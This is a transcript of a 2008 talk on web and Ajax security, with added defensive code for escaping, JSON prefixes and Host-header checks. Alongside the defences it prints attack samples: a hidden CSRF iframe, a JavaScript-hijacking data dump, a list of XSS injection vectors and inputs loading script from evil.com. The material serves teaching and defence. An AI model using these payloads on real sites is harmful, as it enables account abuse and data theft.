Ajax Security

A talk from the Ajax Experience

Transcript of "Ajax Security"

1. Ajax Security
   Keeping your application safe
   Joe Walker
   Copyright SitePen, Inc. 2008. All Rights Reserved

2. 89 out of 10 Websites have serious vulnerabilities

3. Goal: Keep the bad guys out of your website

4. The Attackers
   Who is the attacker?
     • Troublemakers / Thieves
   Who is the victim?
     • Your data / Your users / Your partners

5. Agenda
   CSRF, Login CSRF
   JavaScript Hijacking
   XSS
   History Stealing
   Combination Attacks
   Session Fixation + ADP + Clickjacking

6. CSRF (Cross Site Request Forgery)
   You can still abuse someone else’s cookies and headers even if you can’t read them
7. Recap: Cross-Domain Rules
   Script running on www.bank.com:
     c = document.cookie; alert(c);   /* Shows cookies from www.bank.com */
   Script running on www.evil.com:
     c = document.cookie; alert(c);   /* Shows cookies from www.evil.com */
   Each page can read only the cookies of its own domain.

8. Abusing a Cookie without reading it
   www.bank.com: “Welcome to Bank.com. We offer the best rates anywhere in the world, guaranteed. Give us your money and we will look after it in the same way we look after little baby kittens.”
   www.evil.com: “Welcome to Evil.com. We’ve got lots of warez to give away for freee. Download our stuffs and then come back and get more stuffs. Videoz, Warez, Codez, Mp3s.”
   Hidden in the evil.com page:
     <iframe width=0 height=0 src="http://bank.com/transfer?amnt=all&dest=MrEvil"/>
   The browser attaches the victim’s bank.com cookies to the iframe’s request, so the transfer runs with the victim’s credentials even though evil.com never sees the cookie.

9. CSRF
   JavaScript is not always required to exploit a CSRF hole
   Often all you need is:
     • <iframe src="dangerous_url">
     • or <img src="dangerous_url"/>
     • or <script src="dangerous_url">
   You can’t use XHR because cross-domain rules prevent the request from being sent
   (True of the browsers of 2008. With CORS, a cross-origin XHR or fetch does send a simple GET or POST, with cookies if the caller asks for credentials; the attacker still cannot read the reply, which is all that matters for CSRF.)

10. CSRF
   CSRF attacks are write-only (with one exception)
   Both GET and POST can be forged
   Referer checking is not a complete fix
   It’s not just cookies that get abused:
     • HTTP-Auth headers
     • Active Directory Kerberos tokens

11. CSRF - Protection
     • Force users to log off: not a 100% solution
     • Check Referer headers (https only): not a 100% solution
     • Include authentication tokens in the body of EVERY request: the only complete solution

12. CSRF - Protection
   Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc)
   POST means forms with hidden fields
     • OWASP servlet filter: http://www.owasp.org/index.php/CSRF_Guard
   Double-submit cookie pattern (Ajax requests only)
     • Read the cookie with JavaScript and submit it in the body (or a header); the attacker’s page cannot read the cookie, so it cannot supply a matching value. It is weaker than a server-stored token if an attacker can set cookies for your domain (e.g. from a sibling subdomain).
13. Login CSRF (Tricking someone into thinking they are you)
   CSRF turned inside out

14. Login CSRF
   If I can make your browser do things behind your back, how about logging you out of some service and back in as me.
   What are the possibilities when you think that you are you, but you’re not; you’re me?

15. Login CSRF - Attacks
   What can I do?
     • See what you search for
     • See what books you want to buy
     • Read emails that you send
     • Steal credit card details through PayPal
     • etc

16. Login CSRF - Defense
   If submitting over https: use Referer checking
     • Do not treat a missing Referer as safe
   Use authentication tokens in your login form
   Watch out for session fixation attacks
     • Invalidate the server session on login and re-create it
17. JavaScript Hijacking (or how your GMail contacts were at risk)
   Sucking data out of Objects before they’re created

18. JavaScript Hijacking
   “CSRF is write-only with one known exception”
   Using <script> automatically evaluates the returned script
   So if you can just find a way to intercept scripts as they are evaluated ...

19. Overriding the Object constructor (object literals called it in the Firefox of the time):
     <script type="text/javascript">
       function Object() {
         alert("Hello, World");
       }
       var x = {};
     </script>

20. Adding a setter from the replaced constructor:
     <script type="text/javascript">
       function Object() {
         this.__defineSetter__('wibble', function(x) { alert(x); });
       }
       var x = {};
       x.wibble = "Hello, World";
     </script>

21. Dumping every property of an object created by a cross-site data service:
     <script type="text/javascript">
       var obj;
       function Object() {
         obj = this;
         this.__defineSetter__('killme', function(x) {
           for (key in obj) {
             if (key != 'killme') {
               alert('Stolen: ' + key + '=' + obj[key]);
             }
           }
         });
         setTimeout("obj['killme']='ignored';", 0);
       }
     </script>
     <script src="http://example.com/data-service/">

22. JavaScript Hijacking
   When you serve JavaScript from a website it could be evaluated in a hostile environment
   Protect secrets in JavaScript in the same way that you would protect them elsewhere
   (Slides 19-21 depend on object and array literals invoking a user-defined Object constructor and inherited setters, which browsers of 2008 did. ECMAScript 5 and current engines create literals without doing either, so that particular theft step no longer works; the cross-site <script src> request itself still carries the victim’s cookies, which is why the prefixes on the next slide are still used.)

23. JavaScript Hijacking
   Sometimes people wish to have a double layer of security to prevent evaluation:
     /*<JSON_HERE>*/                    (Don’t do this)
     while(true); <JSON_HERE>           (Google)
     throw new Error(""); <JSON_HERE>   (DWR)
     {}&& <JSON_HERE>
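The prefixes from slide 23 as a server would emit them and as a same-origin client would strip them, added here as an example that is not part of the talk. It also shows why the comment wrapper is the one marked “Don’t do this”: a string inside the data can close the comment early. The response is a top-level array because a bare object literal does not even parse as a script statement, whereas an array is a valid expression statement and so was the response shape these attacks targeted. Function names are mine; new Function is used only to simulate what a cross-site script tag would do.

```javascript
// Added example, not from the talk: the wrappers from slide 23, the matching
// client-side unwrap, and a simulation of what a <script src> tag does with
// each. Names are mine; JSON_HERE is assumed to be a top-level array.

function wrapJson(kind, value) {
  const json = JSON.stringify(value);
  switch (kind) {
    case 'comment': return '/*' + json + '*/';            // "don't do this"
    case 'while':   return 'while(true);' + json;         // Google
    case 'throw':   return 'throw new Error("");' + json; // DWR
    case 'andand':  return '{}&&' + json;                 // a block, then a syntax error
    default: throw new Error('unknown wrapper ' + kind);
  }
}

// Client side (XHR on the same origin): strip the exact prefix, then treat the
// rest as data. JSON.parse refuses anything that is not JSON, so the body is
// never evaluated as script.
const PREFIX = { while: 'while(true);', throw: 'throw new Error("");', andand: '{}&&' };
function unwrapJson(kind, text) {
  const prefix = PREFIX[kind];
  if (!prefix || !text.startsWith(prefix)) throw new Error('response lacks the expected prefix');
  return JSON.parse(text.slice(prefix.length));
}

// What a cross-site <script> tag does with the response: compile it and run it.
// (Not called on the while(true) form, which would loop forever by design.)
function evaluateAsScript(text) {
  try {
    new Function(text)();
    return 'ran';
  } catch (e) {
    return e instanceof SyntaxError ? 'syntax error' : 'threw';
  }
}

// Constructed data. The second record carries an attacker-chosen string with
// "*/" in it; JSON.stringify does not escape '/' or '*', so inside a comment
// wrapper the comment ends there and the rest runs as code.
const contacts = [{ name: 'Joe', email: 'joe@example.com' }];
const poisoned = [{ name: '*/ globalThis.hijacked = true; /*' }];
```

The while(true) and throw forms stop a script tag before any data is reached, and {}&& fails to compile at all, so none of them can be harvested cross-site; all three are trivial to strip on the legitimate client. The comment form only looks equivalent.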
24. XSS (Cross Site Scripting)
   Abusing someone’s trust in your typing

25. [image-only slide]

26. XSS
   2 types:
     • Reflected: Script embedded in the request is ‘reflected’ in the response
     • Stored: Attacker’s input is stored and played back in later page views

27. XSS
   Scenario: You let the user enter their name
   Someone is going to enter their name like this:
     Joe<script src="http://evil.com/danger.js">
   Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe
   Generally HTML is not a valid input, but sometimes it is:
     • Blogs, MySpace, Wikis, RSS readers, etc

28. XSS - Making User Input Safe
   So, you filter out ‘<script.*>’ and then you’re safe. Right?
29. XSS - Places that scripts get eval()ed
   1.  <table background="javascript:danger()">
   2.  <input type='image' src='javascript:danger()'/>
   3.  <object type="text/x-scriptlet" data="evil.com/danger.js">
   4.  <img src='javascript:danger()'/>
   5.  <frameset><frame src="javascript:danger()">
   6.  <link rel="stylesheet" href="javascript:danger()"/>
   7.  <base href="javascript:danger()">
   8.  <meta http-equiv="refresh" content="0;url=javascript:danger()">
   9.  <p style='background-image: url("javascript:danger()")'>
   10. <a href='javascript:danger()'>
   11. <tr background="javascript:danger()">
   12. <body onload='danger()'>
   13. <div onmouseover='danger()'>
   14. <body background="javascript:danger()">
   15. <div onscroll='danger()'>
   16. <div onmouseenter='danger()'>
   17. <style>@import evil.com/danger.js</style>
   18. <style>BODY{-moz-binding:url("http://evil.com/danger.js#xss")}</style>
   19. <xss style="behavior:url(danger.htc);">
   20. <div style="background-image: url(javascript:danger())">
   21. <div style="width: expression(danger());">
   22. <xss style="xss:expression(danger())">
   Many more: http://ha.ckers.org/xss.html
30. XSS - Making User Input Safe
   It’s made 1000 times worse by browsers being able to make sense of virtually anything.
   This:  <a href="a.html" link</a>  makes perfect sense to a browser.

31. XSS - Making User Input Safe
   It’s made 1000 times worse by browsers being able to make sense of virtually anything.
   This:  <a href="a.html">link  makes perfect sense to a browser.

32. XSS - Making User Input Safe
   It’s made 1000 times worse by browsers being able to make sense of virtually anything.
   This:  <a href="a.html >link</a>  makes perfect sense to a browser.

33. XSS - Making User Input Safe
   It’s made 1000 times worse by browsers being able to make sense of virtually anything.
   This (depending on some encoding tricks):  ¼a href="a.html"¾link¼/a¾  makes perfect sense to a browser.

34. XSS - Making User Input Safe
   And we haven’t got into:
     • Flash (ActionScript ~= JavaScript)
     • SVG (can embed JavaScript)
     • XML Data Islands (IE only)
     • HTML+TIME
   You can use both <object> and <embed> for many of these
35. XSS - The Heart of the Problem
   “Be conservative in what you do; be liberal in what you accept from others”
   Postel’s Law

36. XSS - The Heart of the Problem
   [Diagram: In + A → Out; B]

37. The web developers get lazy ...

38. The browser fixes the problems ...

39. The users like the new browser ...

40. The web developers get even lazier ...

41. The browser fixes the problems ...

42. The users like the new browser even more ...

43. XSS - The Heart of the Problem
   ¼STYLE¾@import'javas
   cri
   pt:danger()';¼/STYLE¾
44. XSS - Protection (HTML is Illegal)
   1. Filter inputs by white-listing input characters
      • Remember to filter header names and values
   2. Filter outputs for the destination environment
      For HTML:
        <  →  &lt;
        >  →  &gt;
        '  →  &apos;  (&apos; is XHTML/HTML5 only; &#39; works in every HTML version)
        "  →  &quot;
        &  →  &amp;
      For JavaScript strings (but see later):
        '   →  \'
        "   →  \"
        LF  →  \n
        CR  →  \r
        other non-alphanumerics  →  \uXXXX
      Other environments have other special chars

45. XSS - Protection (well-formed HTML is legal)
   1. Filter inputs as before
   2. Validate as HTML and throw away if it fails
   3. Swap characters for entities (as before)
   4. Swap back a whitelist of allowed tags, e.g.:
      • &lt;strong&gt;  →  <strong>
   5. Take extra care over attributes:
      • &lt;a href=&quot;([^&]*)&quot;/&gt;  →  <a href="$1"/>
      (that pattern still lets javascript: through, since the URL contains none of & < > "; restrict the href to http(s) as well)
   6. Take great care over regular expressions
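The escaping tables from slide 44 and the escape-then-whitelist procedure from slide 45, as an added example that is not part of the talk. The function names are mine, and the whitelist is a deliberately small one (strong, em, p and http(s) links) so the mechanics are visible; the href check is the addition slide 45’s ([^&]*) pattern needs.

```javascript
// Added example, not from the talk: output escaping for the two contexts the
// slides call protectable, then "escape everything, swap back a whitelist"
// for sites that must accept well-formed HTML. Names are mine.

// HTML text and attribute-value context. One regex with a lookup table, so
// '&' is never escaped twice. &#39; is used instead of &apos;, which is not
// defined in HTML 4.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// JavaScript string-literal context: <script>var name = "$";</script>
// Quotes, backslash and line terminators get their short escapes; everything
// else that is not alphanumeric becomes \uXXXX, so "</script>" can neither
// close the string nor the enclosing <script> block.
const JS_ESCAPES = { '"': '\\"', "'": "\\'", '\\': '\\\\', '\n': '\\n', '\r': '\\r' };
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g, (c) =>
    JS_ESCAPES[c] || '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Slide 45 steps 3-5: entity-encode the whole input, then re-enable a few
// exact tag spellings. Anything with attributes, or any tag not listed, stays
// encoded (a stray re-enabled closing tag is harmless to browsers).
function sanitizeWhitelist(input) {
  let out = escapeHtml(input);
  for (const tag of ['strong', 'em', 'p']) {
    out = out.replace(new RegExp('&lt;(/?)' + tag + '&gt;', 'g'), '<$1' + tag + '>');
  }
  // Links: unlike the slide's ([^&]*), only http(s) URLs are restored, because
  // "javascript:danger()" contains none of & < > " and would slip through.
  // &amp; is allowed inside the URL so query strings survive, already encoded.
  out = out.replace(
    /&lt;a href=&quot;(https?:\/\/(?:[^&\s]|&amp;)*)&quot;&gt;(.*?)&lt;\/a&gt;/g,
    '<a href="$1" rel="nofollow">$2</a>');
  return out;
}
```

escapeJsString is for the <script>str = "$";</script> injection point only; the value must still sit inside quotes, and the page should declare its charset so a multi-byte trick cannot turn an escaped byte back into a quote.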
46. XSS - Protection (malformed HTML is legal)
   1. Find another way to do it / Swap jobs / Find some other solution to the problem
   2. Create a tag soup parser to create a DOM tree from a badly formed HTML document
      • Remember to recursively check encodings
   3. Create a tree walker that removes all non-approved elements and attributes

47. There is NO WAY to protect against some injection points

48. XSS - Injection Points
   Places you can protect:
     • Plain content: <div>$</div>
     • Some attribute values: <input name=x value="$"> (but take care)
     • JavaScript string values: <script>str = "$";</script> (but take care)
   Anything else is likely to be unsafe

49. XSS - Injection Points
   Places you can’t easily protect:
     • <script>$</script>
     • <div $>
     • <div style="$">...
     • <div background="$">
     • <img src="$">
     • etc
   If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole

50. XSS Tricks: Comment Power-up

51. XSS - Comment Power-up
   Commonly reflected attacks have length restrictions
   How to create space for an injection attack:
     • Put ‘<script>/*’ in the length-restricted but unfiltered field, and ‘*/’ followed by the payload in a later field that has no length limit, even one that is HTML-escaped: everything between /* and */ is a comment to the script parser, and a payload written without < > " & ' survives the escaping and runs from inside the script block

52. XSS - Summary
   For data input:
     • Restrict allowed characters for the destination type
   For data output:
     • Escape for the destination environment
     • Ensure the encoding is specified (e.g. UTF-8)
   Allow injection only into known safe points
   Never assume that a hole is too small to jump through
53. History Stealing
   I know where you’ve been, parts 1, 2, 3

54. History Stealing - Part 1
   Mr. Evil wants to know if you visit bank.com
   He creates a page with a link and uses a script to read the CSS link color:
     • purple: customer
     • blue: not a customer

55. History Stealing - Part 2
   2 methods of detecting link color:
     • Easy - use JavaScript to read CSS properties
     • When JS is turned off - use CSS to ping the server (an a:visited rule whose background-image URL points at the attacker’s server)
   (Browsers closed both routes from 2010 on by limiting what :visited may style and reporting the unvisited style to scripts.)

56. History Stealing - Part 2 (the same idea for login detection)
   Point a script tag at a protected HTML resource, detect differing replies by differing error messages
     <script src="http://mail.google.com/mail">
   http://ha.ckers.org/weird/javascript-website-login-checker.html

57. History Stealing - Part 3
   A page can quickly check thousands of sites and find where you bank and store your email
   A page can follow your clicks around the net:
     • Check for a common set of URLs
     • Page reports hits to server
     • Server reads hit pages, greps out links, sends links back
     • Page checks and follows a click-stream
58. Combination Attacks
   Small holes don’t add up, they multiply up

59. Web Worms
   If your site isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts
   XHR/Flash/Quicktime can be used as a vector
   Web worms grow much faster than email worms
   So far, infections have been mostly benign, like how email worms were in the early 90’s ...
   http://www.whitehatsec.com/downloads/WHXSSThreats.pdf

60. Intranet Hacking
   History stealing to enumerate hosts inside the firewall
   Anti-DNS pinning to read HTML from inside
   Many routers / firewalls / etc have default passwords, which an attacker can exploit
   Use CSRF to alter router / firewall settings
   http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf

61. Clickjacking
   When the page you are looking at is not the page you think you are looking at

62. Clickjacking - Protection
     if (window.top != window) {
       document.body.style.display = "none";
     }
   (A script-only check can be defeated, for instance by framing the page with scripting disabled through the iframe sandbox attribute. Also send an X-Frame-Options or Content-Security-Policy frame-ancestors header so the browser refuses to frame the page at all.)

63. ADP = Anti DNS Pinning
   Moving intranet servers into your domain
64-75. Anti-DNS Pinning (the sequence, one step per slide)
   Setup: the DNS server for evil.com can answer with either 1.2.3.4 (the attacker’s web server) or 10.0.0.1 (a server on the victim’s intranet).
   1.  Victim: “Let’s visit evil.com”
   2.  Browser → DNS: “What’s the IP address for evil.com?”
   3.  DNS → browser: “You need 1.2.3.4” (timeout = 1 sec)
   4.  Browser → 1.2.3.4: “Can I have http://evil.com?”
   5.  1.2.3.4 returns HTML + JavaScript that creates an iframe 2 seconds after the page has loaded
   6.  Time passes (2 seconds)
   7.  Browser → DNS: “What’s the IP address for evil.com?”
   8.  DNS → browser: “You need 10.0.0.1”
   9.  Browser → 10.0.0.1: “Can I have http://evil.com/blah?”
   10. This web server is really http://intranet.corp.com, and it answers
   11. The outer frame reads the text from the inner iframe (both are evil.com to the browser) and sends it back to 1.2.3.4
76. Anti-DNS Pinning
   About ‘Pinning’:
   Browsers ‘pin’ addresses to stop short timeouts
   DNS round-robin forces a re-query of DNS if the website appears to be down
   So websites can get around pins by firewalling themselves, thus appearing to be down

77. Anti-DNS Pinning
   It’s not great for the Internet:
   The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: cookie-protected resources are safe (for now)
   But it’s great for Intranet hacking
   No cookies needed to read from 192.168.0.1 or 127.0.0.1
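The server-side defence against the rebinding sequence above, as an added example that is not part of the talk: at step 9 the request for http://evil.com/blah reaches 10.0.0.1 carrying Host: evil.com, and an intranet server that only answers for its own names refuses it. The allow-list, the request shape and the names are assumptions for this demo.

```javascript
// Added example, not from the talk: reject requests whose Host header is not
// one of this server's own names, which is what defeats DNS rebinding. The
// allow-list and request shape are assumptions for this demo.
const ALLOWED_HOSTS = new Set(['intranet.corp.com', 'localhost', '10.0.0.1']);

// Normalise a Host header: lower-case, strip the port, unwrap IPv6 brackets.
function hostName(hostHeader) {
  if (typeof hostHeader !== 'string' || hostHeader.length === 0) return null;
  const h = hostHeader.trim().toLowerCase();
  if (h.startsWith('[')) {                 // "[::1]:8080"
    const end = h.indexOf(']');
    return end === -1 ? null : h.slice(1, end);
  }
  const colon = h.lastIndexOf(':');        // "intranet.corp.com:8080"
  return colon === -1 ? h : h.slice(0, colon);
}

function hostAllowed(hostHeader) {
  const name = hostName(hostHeader);
  return name !== null && ALLOWED_HOSTS.has(name);
}

// What a minimal intranet server would answer. req = { headers: { host } }
function handle(req) {
  if (!hostAllowed(req.headers && req.headers.host)) {
    // 421 Misdirected Request: the request was not meant for this server.
    return { status: 421, body: 'unknown Host header' };
  }
  return { status: 200, body: 'intranet page' };
}

// Constructed requests: the rebinding victim's browser sends "evil.com".
function demo() {
  return {
    rebound: handle({ headers: { host: 'evil.com' } }),
    direct: handle({ headers: { host: 'Intranet.Corp.Com:8080' } }),
    noHost: handle({ headers: {} }),
  };
}
```

Checking Host (rather than the connecting IP, which is the victim’s own machine) is the right test because the attacker controls the DNS answer but not the name the browser believes it is talking to.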
78. Questions?
   Joe Walker
   http://sitepen.com
   http://directwebremoting.org/blog/joe

79. Web 2.0 Hacking
   Everything has a down side

80. Web 2.0 Hacking
   Building blocks:
     • Google Alerts: Search to EMail
     • Mailinator: EMail to RSS
     • Ponyfish: Web to RSS via scraping
     • Storage: DabbleDB, Zoho
     • Yahoo Pipes: RSS remixing
     • L8R: Cron for EMail
     • Google Mashup Editor: RSS to REST API
     • Dapper, OpenKappow

81. More Information

82. Dropping SSL after login is dangerous
   Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password
   Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session:
     • https://mail.google.com/mail/
     • https://www.google.com/calendar/
     • etc.

83. Useful Tools
   Firefox:
     • NoScript - Accept scripts only from sites you trust
     • AltCookies - Accept cookies only from sites you trust
     • EditCookies - Alter cookies for testing
     • Firebug - Dig deeply into HTTP/JavaScript/CSS
   General:
     • Paros - Filtering Proxy (can be configured to be transparent)
     • Burp - Like Paros
     • Fiddler - Like Paros with integration into IE